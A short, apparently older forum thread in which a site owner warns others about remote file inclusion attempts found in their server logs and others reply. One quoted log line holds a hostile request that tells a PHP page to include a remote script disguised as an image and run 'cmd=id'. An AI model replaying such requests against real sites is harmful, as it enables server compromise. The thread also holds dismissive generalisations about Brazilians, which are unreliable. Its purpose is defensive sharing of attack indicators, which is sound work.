Forums

just a heads-up (5 posts)

  1. whooami
    Member
    Posted 3 years ago #

    I saw two interesting things in my server logs this morning.. 2 similar attempts:

    ---

    201-13-106-48.dsl.telesp.net.br - - [07/Mar/2006:07:26:07 -0600] "GET /archives/category/irritations/index.php?showresults=http://www.moonyoung.seoul.kr/zboard/data/
    food/pc110002.jpg?&cmd=id HTTP/1.0" 200 32770 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

    ---

    The link at the end of that query is not an image. It's a script that attempts to open up some sort of php shell.

    I got another hit of the same type, and from the same Brazilain IP range and without even looking figure its the same crap.

    Im not sure what harm can be done, and honestly, Im not willing to try, but I will be blocking some more brazilian "friends" as well as anything related to the .kr domain.

    According to zone-h, that domain was rooted on 2/20 by some brazilians.. how nice.

  2. spencerp
    Member
    Posted 3 years ago #

    Oh Jesus!, they just never give up do they? =( Thanks for the heads up whooami.. =) I'll have to check mine here soon as well then..[goes off mummbling god damn kids n shnit]

    spencerp

  3. whooami
    Member
    Posted 3 years ago #

    haha, yw spencer :P

    Im googling it and it looks like 1. its and old idea 2. its trying to exploit php includes that arent done properly, and 3. php's fopen. Thats just what Googling it tells me.

    Off topic, is Internet access that damn cheap in Brazil that all these people can do all day is run around trying to cause problems???

  4. moshu
    Member
    Posted 3 years ago #

    .seoul.kr
    That tells me it is (South) Korea, not Brazil.

  5. whooami
    Member
    Posted 3 years ago #

    thats the site, in fact both sites were south korean. the ips are brazilian. Additionally, the rooters were Brazilian
    http://www.zone-h.org/defacements/mirror/id=3356327/

    --I can read my logs--

    Its just a heads-up, anyway, something else to look out for.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.